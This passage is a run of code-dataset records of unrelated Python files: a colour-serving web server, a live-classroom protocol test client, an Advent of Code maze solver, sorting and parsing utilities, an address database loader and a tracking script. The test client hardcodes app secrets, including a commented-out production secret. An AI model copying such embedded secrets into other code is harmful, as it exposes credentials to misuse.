e)\n","sub_path":"data_generators/generator_cifar100.py","file_name":"generator_cifar100.py","file_ext":"py","file_size_in_byte":4250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"239959114","text":"#!/usr/bin/env python\n\nimport SimpleHTTPServer\nimport SocketServer\nimport random\n\ndef page(v):\n return '''\n\n\ncolor\n\n\n\n''' + v + '''\n\n\n'''\n\ndef main():\n handler = SimpleHTTPServer.SimpleHTTPRequestHandler\n server = SocketServer.TCPServer(('0.0.0.0', 80), handler)\n\n while ( 1 ):\n color = '#%06X' %(random.randint(0,255**3-1))\n content = '
%s
' %(color,color)\n\n    f = open('index.html', 'w')\n    f.write(page(content))\n    f.close()\n\n    server.handle_request()\n\nif __name__ == '__main__':\n    main()\n","sub_path":"color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"405790613","text":"# _*_ coding:utf-8 _*_\r\n\r\nimport socket\r\nimport time\r\nfrom commons.liveServiceMonitor.kodec import msg_type_pb2, logical_pb2\r\nfrom commons.liveServiceMonitor.public import addMd5\r\nfrom commons.liveServiceMonitor.public import IPConver\r\nimport struct\r\nimport random\r\nimport platform\r\nfrom commons.liveServiceMonitor.public import globalvar\r\n#from commons.liveServiceMonitor.public.logger import logger\r\n\r\n\r\n# Test-environment constants\r\napp_secret = '4911898908f9d03ae7bf913f2ae16cb1'\r\napp_id = '58eee6ac19b005fec0d848ce'\r\n\r\n# Production-environment constants\r\n# app_secret = 'ea4958b53cd9da924e1223252d5d215b'\r\n# app_id = '59a91c3237d3d8d28516801c'\r\n\r\n#### Join a live room\r\nclass JoinRoom(object):\r\n    def __init__(self, liveId, userId, nickName, userType, roomIndex, app_id, app_secret):\r\n        self.liveId = liveId\r\n        self.userId = userId\r\n        self.nickName = nickName\r\n        self.userType = userType\r\n        self.roomIndex = roomIndex\r\n        self.appId = app_id\r\n        self.appSecret = app_secret\r\n        self.join_token = \"\"\r\n        self.isForbidden = False\r\n        self.chatDisabled = False\r\n        self.groupChatDisabled = False\r\n        # Added: join-room request and response timestamps\r\n        self.join_req_time = 0\r\n        self.join_res_time = 0\r\n        # Added: re-join request & response timestamps\r\n        self.rejoin_req_time = 0\r\n        self.rejoin_res_time = 0\r\n        # Initialize response-time intervals\r\n        self.join_duration = 0\r\n        self.rejoin_duration = 0\r\n\r\n    # Build the join request\r\n    def pack_joinReq(self):\r\n        reqPack = logical_pb2.RequestPackage()\r\n        commFrame = reqPack.head_frame\r\n        commFrame.msg_type = msg_type_pb2.JOIN_ROOM_REQ\r\n        commFrame.msg_no = 'wk_test_' + str(random.randint(1, 99999))  # use a random number for now\r\n        commFrame.msg_from_user_id = self.userId  # 12976231 teacher ID\r\n        commFrame.msg_to_user_id = \"\"\r\n        commFrame.device_type = 0  ## device type: 0 pc, 1 ios, 2 android, 3 mobile web, 4 pc web\r\n        commFrame.version = 101001301\r\n        # commFrame.timestamp = int(time.time() * 1000)\r\n        commFrame.ip = IPConver.ip2int(socket.gethostbyname(socket.gethostname()))\r\n\r\n        ## Client OS and version info\r\n        commFrame.client_info.os_name = platform.system()\r\n        commFrame.client_info.os_version = platform.win32_ver()[0]\r\n        commFrame.client_info.client_version = \"wkai2133\"\r\n        commFrame.extended_fields['from'] = 'multiuser_test'\r\n\r\n        # Compression flag for the request packet: 0 uncompressed, 1 compressed\r\n        msg_flag = int('0x0000', 16)\r\n\r\n        join_Room_message = logical_pb2.RequestMessage()\r\n        joinRoom = join_Room_message.join_room\r\n        joinRoom.nickname = self.nickName\r\n        joinRoom.user_id = self.userId\r\n        joinRoom.avatar_url = 'https://cdn.17xueba.com//pro/server/image/2018/01/20180122134340183387.png'\r\n        joinRoom.live_id = self.liveId\r\n        joinRoom.user_type = self.userType  # allowed values: 1 student, 2 teaching assistant, 3 teacher\r\n        joinRoom.room_index = self.roomIndex\r\n        joinRoom.timestamp = int(time.time() * 1000)\r\n        joinRoom.app_id = self.appId\r\n\r\n        # Copy all parameters into a dict and compute the signature\r\n        para_dict = dict()\r\n        para_dict['nickname'] = joinRoom.nickname\r\n        para_dict['user_id'] = joinRoom.user_id\r\n        para_dict['avatar_url'] = joinRoom.avatar_url\r\n        para_dict['live_id'] = joinRoom.live_id\r\n        para_dict['user_type'] = joinRoom.user_type\r\n        para_dict['room_index'] = joinRoom.room_index\r\n        para_dict['timestamp'] = joinRoom.timestamp\r\n        para_dict['app_id'] = joinRoom.app_id\r\n        joinRoom.sign = addMd5.addSign(para_dict, self.appSecret)\r\n\r\n        # Serialize the RequestPackage request packet\r\n        reqPack.logical_frame = join_Room_message.SerializeToString()\r\n        joinReqPack = reqPack.SerializeToString()\r\n\r\n        # Compute the length of the request packet\r\n        msg_len = reqPack.ByteSize() + 2\r\n        joinReq_message = struct.pack('!IH', msg_len, msg_flag) + joinReqPack\r\n        return joinReq_message\r\n\r\n    # Build the re_join request\r\n    def pack_rejoin(self, token):\r\n        reqPack = logical_pb2.RequestPackage()\r\n        commFrame = reqPack.head_frame\r\n        commFrame.msg_type = msg_type_pb2.RE_JOIN_REQ\r\n        commFrame.msg_no = 'wk_test_' + str(random.randint(1, 99999))  # use a random number for now\r\n        commFrame.msg_from_user_id = self.userId\r\n        commFrame.msg_to_user_id = \"\"\r\n        commFrame.device_type = 0\r\n        commFrame.version = 101000012\r\n        # commFrame.timestamp = int(time.time() * 1000)\r\n        commFrame.ip = IPConver.ip2int(socket.gethostbyname(socket.gethostname()))\r\n        commFrame.client_info.os_name = \"windows\"\r\n        commFrame.client_info.client_version = \"wkai2133\"\r\n        commFrame.extended_fields['from'] = 'multiuser_test'\r\n\r\n        # Compression flag for the request packet: 0 uncompressed, 1 compressed\r\n        msg_flag = int('0x0000', 16)\r\n\r\n        rejoin_message = logical_pb2.RequestMessage()\r\n        rejoin_message.token = token\r\n        joinRoom = rejoin_message.re_join\r\n\r\n        # Serialize the RequestPackage request packet\r\n        reqPack.logical_frame = rejoin_message.SerializeToString()\r\n        rejoin_pack = reqPack.SerializeToString()\r\n\r\n        # Compute the length of the request packet\r\n        msg_len = reqPack.ByteSize() + 2\r\n        final_message = struct.pack('!IH', msg_len, msg_flag) + rejoin_pack\r\n        return final_message\r\n\r\n    # Packet for changing the live-stream status\r\n    def pack_statusChange(self, token, liveStatus):\r\n        reqPack = logical_pb2.RequestPackage()\r\n        reqCommFrame = reqPack.head_frame\r\n        reqCommFrame.msg_type = msg_type_pb2.LIVE_STATUS_CHANGE_REQ\r\n        reqCommFrame.msg_no = 'wk_tt_' + str(random.randint(1, 99999))  # use a random number\r\n        reqCommFrame.msg_from_user_id = self.userId\r\n        reqCommFrame.msg_to_user_id = \"\"\r\n        reqCommFrame.device_type = 0  ### device type: 0 pc, 1 ios, 2 android, 3 mobile web, 4 pc web\r\n        reqCommFrame.version = 101000012\r\n        # reqCommFrame.timestamp = int(time.time() * 1000)\r\n        reqCommFrame.ip = IPConver.ip2int(socket.gethostbyname(socket.gethostname()))\r\n        reqCommFrame.client_info.os_name = \"windows\"\r\n        reqCommFrame.client_info.client_version = \"wkai2133\"\r\n        reqCommFrame.extended_fields['from'] = 'multiuser_test'\r\n\r\n        # Build the request logical frame\r\n        req_message = logical_pb2.RequestMessage()\r\n        req_message.token = token\r\n        reqBody = req_message.live_status_change\r\n        reqBody.status = liveStatus\r\n\r\n        # Serialize the request packet\r\n        reqPack.logical_frame = req_message.SerializeToString()\r\n        reqMessage = reqPack.SerializeToString()\r\n\r\n        Msg_flag = int('0x0000', 16)\r\n        # Compute the length of the request packet\r\n        Msg_len = reqPack.ByteSize() + 2\r\n        changeMessage = struct.pack('!IH', Msg_len, Msg_flag) + reqMessage\r\n        return changeMessage\r\n\r\n    # Packet for fetching the live-stream configuration\r\n    def pack_getLiveconfig(self, token):\r\n        reqPack = logical_pb2.RequestPackage()\r\n        reqCommFrame = reqPack.head_frame\r\n        reqCommFrame.msg_type = msg_type_pb2.GET_LIVE_CONFIG_REQ\r\n        reqCommFrame.msg_no = 'wk_tt_' + str(random.randint(1, 99999))  # use a random number\r\n        reqCommFrame.msg_from_user_id = self.userId\r\n        reqCommFrame.msg_to_user_id = \"\"\r\n        reqCommFrame.device_type = 0  ### device type: 0 pc, 1 ios, 2 android, 3 mobile web, 4 pc web\r\n        reqCommFrame.version = 101000012\r\n        # reqCommFrame.timestamp = int(time.time() * 1000)\r\n        reqCommFrame.ip = IPConver.ip2int(socket.gethostbyname(socket.gethostname()))\r\n        reqCommFrame.client_info.os_name = \"windows\"\r\n        reqCommFrame.client_info.client_version = \"wkai2133\"\r\n        reqCommFrame.extended_fields['from'] = 'multiuser_test'\r\n\r\n        # Build the request logical frame\r\n        req_message = logical_pb2.RequestMessage()\r\n        req_message.token = token\r\n        reqBody = req_message.get_live_config\r\n\r\n        # Serialize the answer request packet\r\n        reqPack.logical_frame = req_message.SerializeToString()\r\n        reqMessage = reqPack.SerializeToString()\r\n\r\n        Msg_flag = int('0x0000', 16)\r\n        # Compute the length of the request packet\r\n        Msg_len = reqPack.ByteSize() + 2\r\n        getconfigMessage = struct.pack('!IH', Msg_len, Msg_flag) + reqMessage\r\n        return getconfigMessage\r\n\r\n    def joinLogic(self, resData):\r\n        if resData.result_frame.code == 0:\r\n            if resData.head_frame.msg_type == msg_type_pb2.JOIN_ROOM_RES:\r\n                # Record the join-room response timestamp\r\n                self.join_res_time = int(time.time() * 1000)\r\n                # Compute the join-room response time\r\n                self.join_duration = self.join_res_time - self.join_req_time\r\n                # Add the teacher's join time to the global dict\r\n                #globalvar.set_value(self.userId,{'teacher_join_duration': self.join_duration})\r\n                globalvar.update_value(self.userId, {'teacher_join_duration': self.join_duration})\r\n                print(\"Teacher joined the room (join_room) successfully!\")\r\n                print('Teacher: {}, join-room response time (ms): {}'.format(self.userId, self.join_duration))\r\n                #logger.info('Teacher: {}, join-room response time (ms): {}'.format(self.userId, self.join_duration))\r\n                print(\"Live status:\", resData.logical_frame.join_room.live_status)\r\n                self.join_token = resData.logical_frame.join_room.token\r\n                self.isForbidden = resData.logical_frame.join_room.is_forbidden\r\n                self.chatDisabled = resData.logical_frame.join_room.chat_disabled\r\n                self.groupChatDisabled = resData.logical_frame.join_room.group_chat_disabled\r\n                return self.join_token\r\n            elif resData.head_frame.msg_type == msg_type_pb2.RE_JOIN_RES:\r\n                # Record the re-join response timestamp\r\n                self.rejoin_res_time = int(time.time() * 1000)\r\n                # Compute the re-join response time\r\n                self.rejoin_duration = self.rejoin_res_time - self.rejoin_req_time\r\n                # Add the teacher's join time to the global dict\r\n                # globalvar.set_value(self.userId,{'teacher_join_duration': self.join_duration})\r\n                globalvar.update_value(self.userId, {'re_join_duration': self.rejoin_duration})\r\n                print(\"Teacher re-joined the room (re_join) successfully!\")\r\n                print('Teacher: {}, re-join response time (ms): {}'.format(self.userId, self.rejoin_duration))\r\n                #logger.info('Teacher: {}, re-join response time (ms): {}'.format(self.userId, self.rejoin_duration))\r\n                print(\"Live status:\", resData.logical_frame.join_room.live_status)\r\n                self.join_token = resData.logical_frame.re_join.token\r\n                self.isForbidden = resData.logical_frame.re_join.is_forbidden\r\n                self.chatDisabled = resData.logical_frame.re_join.chat_disabled\r\n                self.groupChatDisabled = resData.logical_frame.re_join.group_chat_disabled\r\n                return self.join_token\r\n            # Get the live-stream config\r\n            elif resData.head_frame.msg_type == msg_type_pb2.GET_LIVE_CONFIG_RES:\r\n                self.live_config = resData.logical_frame.get_live_config_res\r\n        else:\r\n            print(resData.result_frame.code, resData.result_frame.msg)\r\n","sub_path":"liveTest/simulateSever/liveServiceMonitor/logical_teach/TJoinRoom.py","file_name":"TJoinRoom.py","file_ext":"py","file_size_in_byte":11565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"12518824","text":"#Advent of Code 2019 Day 18\n\nfrom collections import deque, defaultdict\nimport string\nimport heapq\n\nf = open('C:/Users/Simon/SkyDrive/Home Stuff/Python/Advent of Code/2019/2019-18b.txt')\ncontents = f.read()\ninput=contents.splitlines()\n\nclass Maze(): #Overall class for maze containing map, keys and doors\n    \n    def __init__(self,input): #Convert input into map and units\n        self.map={}\n        self.paths=defaultdict(dict)\n        self.w=len(input[0])\n        self.h=len(input)\n        
lCase='0123'+string.ascii_lowercase #List for entrances and keys\n uCase=string.ascii_uppercase #List for doors\n self.keyPositions={}\n self.doorPositions={}\n self.keyNames=set()\n self.doorNames=set()\n self.shortestBetweenKeys=float('Inf')\n \n for j in range(self.h):\n for i in range(self.w):\n x=input[j][i]\n pos=complex(i,j)\n if x in lCase: #Add entries to lookup key from position, or position from key\n self.keyNames.add(x)\n self.keyPositions[x]=pos\n elif x in uCase: #Add entries to lookup door from position, or position from door\n self.doorNames.add(x)\n self.doorPositions[x]=pos\n self.map[pos]=x\n \n self.nKeys=len(self.keyNames)\n self.findDistances()\n \n def findDistances(self): #Run BFS search to find min distances and doors to get to/from each key\n starts=''.join(sorted(self.keyNames)) #List of starting points of each leg, consisting of the entrances '0123' and each key\n for s in starts:\n ends=set(starts[starts.index(s)+1:]) #Paths are reversible so we only need to check ends that are after start in the list\n queue=deque() #BFS queue\n queue.appendleft(BFSNode(self.keyPositions[s],0,set(),set()))\n visited=set() #Track set of visited points, to avoid backtracking\n while len(queue)>0 and len(ends)>0:\n current=queue.pop()\n pos=current.pos\n visited.add(pos)\n tile=self.map[pos]\n if tile in self.doorNames: #If current position is a door, add it to node\n current.addDoor(tile)\n elif tile in ends: #If current position is a key endpoint, create a path object and add to paths dict\n path=Path(s,tile,current.dist,current.doors.copy(),current.keys.copy())\n self.paths[s][tile]=path\n self.paths[tile][s]=path\n if current.dist0:# and n<1000:\n node=heapq.heappop(openHeap) #Examine node in open heap with lowest f\n if node.__hash__() in closedSet:\n continue #If state has been seen before, skip\n closedSet.add(node.__hash__())\n n+=1\n if n%1000==1:\n print(str(n)+': Current node '+str(node))\n if node.h==0: #Check if current node is solution\n print(str(n)+': Solution node '+str(node))\n return(node)\n #Otherwise expand node\n remainingKeys=self.keyNames-node.found\n for dest in remainingKeys: #For each unvisited key, check whether the path is blocked by any locked doors\n for i in range(4): #Find which of the 4 bots has the key in its quadrant\n if str(i) in self.paths[dest]:\n botNum=i\n break\n path=self.paths[node.keys[botNum]][dest]\n valid=True #Tracker for valid path (path with no locked doors or uncollected keys in the way\n for door in path.doors:\n if door.lower() not in node.found: #If a locked door is found, set valid to False and stop checking\n valid=False\n break\n if valid:\n for key in path.keys:\n if key not in node.found: #If an uncollected key is found in the middle of the path, set valid to False and stop checking\n valid=False\n break\n if valid: #If path is valid, create child node\n childKeys=node.keys.copy()\n childKeys[botNum]=dest\n childFound=node.found.copy()\n childFound.add(dest)\n childPath=node.path+dest\n child=AStarNode(self,node.g+path.dist,childKeys,childFound,childPath)\n if child.__hash__() not in closedSet:\n heapq.heappush(openHeap,child)\n \n \n print('Nodes exhausted, no solution found')\n \n \nclass Path(): #Path between two keys (or entrance to a key)\n def __init__(self,start,end,dist,doors,keys):\n self.start=start\n self.end=end\n self.dist=dist\n self.doors=doors\n self.keys=keys \n \n def __repr__(self):\n return(str(self.start)+' to '+str(self.end)+' dist='+str(self.dist)+' Doors: '+str(self.doors)+ ' Keys: 
'+str(self.keys))\n\nclass BFSNode(): #Node for BFS\n def __init__(self,pos,dist,doors,keys):\n self.pos=pos\n self.dist=dist\n self.doors=doors\n self.keys=keys\n \n def addDoor(self,door): #Add door to set of doors visited by node\n self.doors.add(door)\n \n def addKey(self,key): #Add key to set of keys visited by node\n self.keys.add(key)\n \nclass AStarNode(): #Node for A*\n \n def __init__(self,maze,dist,keys,found,path):\n\n self.maze = maze\n self.keys = keys #List of 4 current keys/entrances\n self.found=found #Set of all keys found so far\n self.path=path #String path of keys found so far\n\n self.g = dist #Distance travelled by bots so far\n self.h = self.nodeH()\n self.f = self.g+self.h\n \n self.status=(self.keys,self.found) #Node status\n \n def nodeH(self): #Heuristic consisting of the minimum possible distance to end - minimum key-to-key distance in maze multiplied by number of keys left to find\n nLeft=len(self.maze.keyNames)-len(self.found)\n return(nLeft*self.maze.shortestBetweenKeys)\n\n def __eq__(self, other):\n return self.status == other.status\n \n def __lt__(self, other):\n return(self.f>>b1 = b.dimshuffle('x',0,'x','x')\n# >>>b1.shape.eval()\n# array([1,2,1,1])\noutput = T.nnet.sigmoid(conv_out + b.dimshuffle('x',0,'x','x'))\nf = theano.function([input],output)","sub_path":"pytest/pylab.py","file_name":"pylab.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"99194891","text":"\"\"\"\nMDL Mol Updating Utilities\n==========================\n\n\"\"\"\n\nimport rdkit.Chem.AllChem as rdkit\n\nfrom stk.utilities import remake\n\n\ndef _with_structure_from_mol(self, path):\n \"\"\"\n Change structure to match a ``.mol`` file.\n\n Parameters\n ----------\n path : :class:`str`\n The full path of the ``.mol`` file from which the structure\n should be updated.\n\n Returns\n -------\n :class:`.Molecule`\n The molecule.\n\n \"\"\"\n\n molecule = remake(\n rdkit.MolFromMolFile(\n molFileName=path,\n sanitize=False,\n removeHs=False,\n )\n )\n return self._with_position_matrix(\n position_matrix=molecule.GetConformer().GetPositions()\n )\n","sub_path":"src/stk/molecular/molecules/molecule/utilities/updaters/mdl_mol.py","file_name":"mdl_mol.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"58196550","text":"def multiple_sep_split(string,maxsplit, spacealso,args):\n \"\"\"Call the function as multiple_sep_split(,,,)\"\"\"\n return_list = []\n final_list = []\n args_list = []\n args_list.extend(args)\n #first we do a split with ' '\n if(spacealso == 1):\n args_list.append(args_list[0])\n args_list[0]=' '\n if maxsplit > 0:\n prev_split=0\n split_count=0\n for i in range(len(string)):\n if string[i] in args_list:\n return_list.append(string[prev_split:i])\n prev_split=i+1\n split_count = split_count+1\n if split_count == maxsplit: \n break\n if prev_split != len(string):\n return_list.append(string[prev_split:])\n else:\n prev_split=0\n for i in range(len(string)):\n if string[i] in args_list:\n return_list.append(string[prev_split:i])\n prev_split=i+1\n if prev_split != len(string):\n return_list.append(string[prev_split:])\n #removing blank members.\n for val in return_list:\n if val != '':\n final_list.append(val)\n\n return final_list\n\n\ndef count_words(path):\n separators = (',','.',':',';','/','\\\\','(',')','{','}','<','>','?','\"','\\'','\\n','\\t')\n fileh = file(path)\n words 
= multiple_sep_split(fileh.read(), -1, 1, separators)\n    word_count_dict={}\n    #print words\n    for value in words:\n        word_count_dict[value] = word_count_dict.get(value, 0)+1\n    return word_count_dict\n    ","sub_path":"doc_word_count.py","file_name":"doc_word_count.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"506504258","text":"__author__ = 'LJJ'\n__date__ = '2019/6/12 4:11 PM'\n\n\ndef quick_sort(arr):\n    \"\"\"\n    Quick sort, using divide-and-conquer plus recursion\n    :param arr:\n    :return: sorted_arr\n    \"\"\"\n    if len(arr) >= 2:\n        pivot_mid = arr[len(arr)//2]  # pick the middle element as the pivot\n        left = []\n        right = []\n        arr.remove(pivot_mid)  # remove the pivot\n        for num in arr:\n            if num > pivot_mid:\n                right.append(num)\n            else:\n                left.append(num)\n        return quick_sort(left) + [pivot_mid] + quick_sort(right)\n    else:\n        return arr\n\n\ndef quick_sort_parti(arr):\n    \"\"\"\n    In-place sorting version\n    :param arr:\n    :return: new_arr\n    \"\"\"\n    arr = arr[:]\n    n = len(arr)\n\n    def partition(arr, start, end):\n        \"\"\"\n        Partition around a pivot\n        :param arr:\n        :param start:\n        :param end:\n        :return:\n        \"\"\"\n        i = start - 1\n        pivot_index = end\n        pivot = arr[end]\n        for j in range(start, end):\n            if arr[j] < pivot:\n                i = i + 1\n                arr[i], arr[j] = arr[j], arr[i]\n        arr[i+1], arr[pivot_index] = arr[pivot_index], arr[i+1]\n        return i + 1\n\n    def sort(arr, start, end):\n        \"\"\"\n        Sort recursively\n        :param arr:\n        :param start:\n        :param end:\n        :return:\n        \"\"\"\n        if start >= end:\n            return\n        p = partition(arr, start, end)\n        sort(arr, start, p-1)\n        sort(arr, p+1, end)\n    sort(arr, 0, n-1)\n    return arr\n\nif __name__ == '__main__':\n    arr = [3,7,1,4,6,15,5,2,7,9,10,15,9,17,12]\n    # print(quick_sort(arr))\n    print(quick_sort_parti(arr))\n\n\n","sub_path":"quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"642712277","text":"import csv \r\nimport numpy as np \r\n\r\ndef getDataSource(data_path):\r\n    mark=[]\r\n    day=[]\r\n    with open(data_path) as csv_file:\r\n        csv_reader=csv.DictReader(csv_file)\r\n        for row in csv_reader:\r\n            mark.append(float(row[\"Marks In Percentage\"]))\r\n            day.append(float(row[\"Days Present\"]))\r\n    return{\"x\":mark,\"y\":day}\r\n\r\ndef findCorrelation(dataSource):\r\n    correlation=np.corrcoef(dataSource[\"x\"],dataSource[\"y\"])\r\n    print(\"Correlation between Marks and Days Present \",correlation[0,1])\r\n\r\ndef setUp():\r\n    data_path=\"Marks.csv\"\r\n    dataSource=getDataSource(data_path)\r\n    findCorrelation(dataSource)\r\n\r\n\r\nsetUp()\r\n","sub_path":"CORRELATION1/marks.py","file_name":"marks.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"5933733","text":"import re\nimport math\nimport sys\n\nclass location(object):\n    def __init__(self):\n        self.name = ''\n        self.x = 0\n        self.y = 0\n        self.neighbors = []\n    \nclass world(object):\n    def __init__(self):\n        self.name = ''\n        self.locations = {}\n        self.names = set()\n        self.blocked_route = [set(('Austin-TX', 'Miami-FL')), set(('Washington_DC', 'Baltimore-MD')), set(('Ann_Arbor-MI', 'St_Louis-MO')),\n                              set(('Vancouver-BC', 'Raleigh-NC')), set(('Atlanta-GA', 'Miami-Fl'))]\n    \n    def read_locations(self, fname):\n        f = open(fname, 'r')\n        print (\"Opening location file\",fname)\n        line = f.readline()\n        while line:\n            cmdlist = re.findall(r'[\\S]+', line)\n            if len(cmdlist) > 0:\n                newLocation = location();\n                newLocation.name = cmdlist[0]\n                
self.names.add(cmdlist[0])\n newLocation.x = float(cmdlist[1])\n newLocation.y = float(cmdlist[2])\n self.locations[cmdlist[0]] = newLocation\n #print \"Read location %s\" % newLocation.name\n line = f.readline()\n f.close()\n print (\"Finished reading location file\")\n\n def input_trip(self, clist, blocked = False):\n ind = 0\n distT = 0\n floc = ''\n oloc = location()\n traveled = set()\n \n \n for cloc in clist:\n if ind > 0:\n dist = get_distance(cloc, oloc)\n distT = distT + dist\n else:\n floc = cloc\n current_route = set((cloc.name, oloc.name))\n if blocked:\n if current_route in self.blocked_route:\n return 'Entered a blocked route!'\n oloc = cloc\n if cloc.name in traveled:\n if cloc.name != floc.name:\n print(cloc.name, floc.name)\n return 'Traveled to a city already visited!'\n else:\n break\n else:\n traveled.add(cloc.name)\n print(\"{0:<36}\".format('Current city is: ' +oloc.name+',')+\"and current distance is %.1f miles\" %(distT))\n ind = ind + 1\n print (\"{0:<36}\".format(\"Total distance: \") + str(distT))\n if (traveled != self.names):\n print(\"Did not travel to all cities!\")\n else:\n print(\"Visited all cities!\")\n if (floc.name != cloc.name):\n print(\"Obama didn't return to his starting position!\")\n else:\n print(\"Obama returned to his starting position!\")\n \ndef get_distance_xy(x1, y1, x2, y2):\n return 500*math.sqrt((x2-x1)*(x2-x1)+(y2-y1)*(y2-y1))/150\n\ndef get_distance(loc1, loc2):\n return get_distance_xy(loc1.x, loc1.y, loc2.x, loc2.y)\n","sub_path":"02 - Algorithms/Travelling_Salesman/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"597335080","text":"__author__ = 'ssamaddar'\nclass File(object):\n\n def __init__(self,name):\n\n self.name = name\n self.type = \"file\"\n self.extension = input(\"What type of file is it?(.exe,.msi...)\")\n self.path = input(\"Where is it?\")\n self.alias = input(\"Is it called something else as well?\").split(\",\")\n self.associated = input(\"What programs are associated with this file?(, for more than 1)\").split(\",\")\n\n\n print (self.name)\n print(self.type)\n print (self.extension)\n print(self.path)\n print (self.alias)\n print(self.associated)","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"484992292","text":"from SpiderDBClient import SpiderDBClient\nimport ast\n\n\nclass HouseSpiderDBClient(SpiderDBClient):\n\n def format_data(self, house_info):\n [zone, link, surface, house_brief, house_detail] = house_info.split(\"||\")\n house_info_db_dict = {\"zone\":zone, \"link\":link, \"surface\":surface, \"house_brief\":house_brief, \"house_detail\":{}}\n house_detail_dict = ast.literal_eval(house_detail)\n for key, value in house_detail_dict.iteritems():\n house_info_db_dict[\"house_detail\"][key] = value\n return house_info_db_dict\n","sub_path":"DAO/HouseSpiderDBClient.py","file_name":"HouseSpiderDBClient.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"441333695","text":"\"\"\"\nCopyright (C) 2016 Julien Durand\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required 
by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport numpy as np\n\ncity_db_path = 'index/cities.dat'\nstreet_db_path = 'index/streets.dat'\nlocality_db_path = 'index/localities.dat'\nnumber_db_path = 'index/numbers.dat'\ncities_post_index_path = 'index/cities_post_index.dat'\nstreets_insee_index_path = 'index/streets_insee_index.dat'\nlocalities_insee_index_path = 'index/localities_insee_index.dat'\nnumbers_locality_index_path = 'index/numbers_locality_index.dat'\nnumbers_geohash_index_path = 'index/numbers_geohash_index.dat'\n\ncity_dtype = np.dtype([\n ('code_insee', 'a5'),\n ('code_post', 'a5'),\n ('nom_commune', 'a45'),\n ('lon', 'int32'),\n ('lat', 'int32'),\n])\n\nstreet_dtype = np.dtype([\n ('street_id', 'int32'),\n ('code_insee', 'a5'),\n ('code_post', 'a5'),\n ('nom_voie', 'a32'),\n])\n\n# 'lieu-dit' in french\nlocality_dtype = np.dtype([\n ('locality_id', 'int32'),\n ('code_insee', 'a5'),\n ('code_post', 'a5'),\n ('nom_ld', 'a80'),\n])\n\nnumber_dtype = np.dtype([\n ('street_id', 'int32'),\n ('locality_id', 'int32'),\n ('number', 'int16'),\n ('rep', 'int8'),\n ('geohash', 'uint64'),\n])\n\n\nclass AddressDatabase:\n\n def __init__(self):\n # data tables\n self.cities = self.load_data(city_db_path, dtype=city_dtype)\n self.streets = self.load_data(street_db_path, dtype=street_dtype)\n self.localities = self.load_data(locality_db_path,\n dtype=locality_dtype)\n self.numbers = self.load_data(number_db_path, dtype=number_dtype)\n\n # indices\n self.cities_post_index = self.load_data(cities_post_index_path)\n self.streets_insee_index = self.load_data(streets_insee_index_path)\n self.localities_insee_index = self.load_data(\n localities_insee_index_path)\n self.numbers_locality_index = self.load_data(\n numbers_locality_index_path)\n self.numbers_geohash_index = self.load_data(\n numbers_geohash_index_path)\n\n def load_data(self, file_path, dtype='int32'):\n return np.memmap(file_path, dtype=dtype)\n","sub_path":"src/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"294717265","text":"#!/usr/bin/env python3\n\nimport argparse\nimport openem\nimport os\nimport cv2\nimport numpy as np\nfrom openem.tracking import *\nimport json\nimport sys\nimport datetime\nimport pytator\nfrom pprint import pprint\nfrom collections import defaultdict\n\nimport yaml\nimport math\n\ndef crop_localization(frame_bgr, localization):\n img_width = frame_bgr.shape[1]\n img_height = frame_bgr.shape[0]\n box_x = round(localization['x'] * img_width)\n box_y = round(localization['y'] * img_height)\n box_width = round(localization['width'] * img_width)\n box_height = round(localization['height'] * img_height)\n img_crop = frame_bgr[box_y:box_y+box_height,box_x:box_x+box_width,:]\n return img_crop\n\ndef join_up_iteration(detections, track_ids):\n tracklets = defaultdict(list)\n num_tracklets = np.max(track_ids) + 1\n assert(len(detections) == len(track_ids))\n for d,tid in zip(detections, track_ids):\n tracklets[tid].append(d)\n return tracklets\n\ndef extend_tracklets(tracklets, length):\n for track_id,track in tracklets.items():\n if len(track) <= 16:\n continue\n\n ext_length = min(length,len(track))\n sum_h=0.0\n sum_w=0.0\n\n 
